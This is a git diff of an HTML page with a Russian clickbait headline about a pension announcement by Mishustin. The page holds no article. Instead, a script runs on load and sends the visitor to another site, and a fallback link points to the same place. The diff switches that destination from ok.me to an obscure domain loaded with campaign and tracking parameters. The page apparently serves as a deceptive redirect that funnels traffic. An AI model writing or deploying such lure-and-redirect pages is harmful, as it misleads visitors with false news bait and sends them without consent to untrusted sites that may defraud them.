--- a/index.html
+++ b/index.html
@@ -19,10 +19,10 @@
 <head>
    <title>Мишустин огласил майскую пенсию - все ахнули, услышав сумму</title>
   <script>
-    window.location.replace("https://ok.me/");
+    window.location.replace("https://fountain-gyrodactylus.com?utm_campaign=78385&utm_content=11c17095-3b50-4d86-b4a0-3d2e8bf035a9&utm_source=[SID]&utm_medium=4150");
   </script>
 </head>
 <body>
-  Если страница не открылась, то нажмите еще раз <a href="https://ok.me">сюда</a>.
+  Если страница не открылась, то нажмите еще раз <a href="https://fountain-gyrodactylus.com?utm_campaign=78385&utm_content=11c17095-3b50-4d86-b4a0-3d2e8bf035a9&utm_source=[SID]&utm_medium=4150">сюда</a>.
 </body>
 </html>
